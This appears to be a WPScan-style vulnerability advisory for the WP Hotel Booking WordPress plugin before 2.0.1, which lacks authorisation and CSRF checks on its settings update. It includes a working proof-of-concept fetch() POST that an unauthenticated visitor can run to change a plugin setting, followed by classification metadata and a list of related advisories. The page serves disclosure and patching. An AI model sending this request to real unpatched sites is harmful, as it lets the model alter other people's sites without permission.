WP Hotel Booking < 2.0.1 – Unauthenticated Arbitrary Settings Update | Plugin Vulnerabilities

Description

The plugin does not have authorisation and CSRF checks in place when updating its settings, which could allow unauthenticated attackers to change them.

Proof of Concept

All settings are affected, example, to change the Thousands Separator one, run the below command in the developer console of the web browser while being on the blog as an unauthenticated user

fetch("/wp-admin/admin-post.php?page=tp_hotel_booking_settings", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'tp_hotel_booking_price_thousands_separator=;;',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

wp-hotel-booking

Fixed in 2.0.1

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

WPScan

Verified

Yes

WPVDB ID

0256a4cb-5d29-44bb-bc69-45edd8484c9d

Timeline

Publicly Published

2022-08-22 (about 3 years ago)

Added

2022-08-22 (about 3 years ago)

Last Updated

2022-10-08 (about 3 years ago)

Other

Published

Title

Published

2024-03-26

Title

WholesaleX < 1.3.2 - Authenticated(Subscriber+) Missing Authorization via multiple AJAX actions

Published

2024-08-09

Title

WP Search Analytics < 1.4.10 - Missing Authorization

Published

2024-11-18

Title

Elfsight Telegram Chat CC <= 1.1.0 - Missing Authorization to Authenticated (Subscriber+) Stored Cross-Site Scripting

Published

2023-01-10

Title

Royal Elementor Addons < 1.3.60 - Subscriber+ Arbitrary Theme Activation

Published

2023-11-21

Title

UserPro < 5.1.2 - Missing Authorization via multiple functions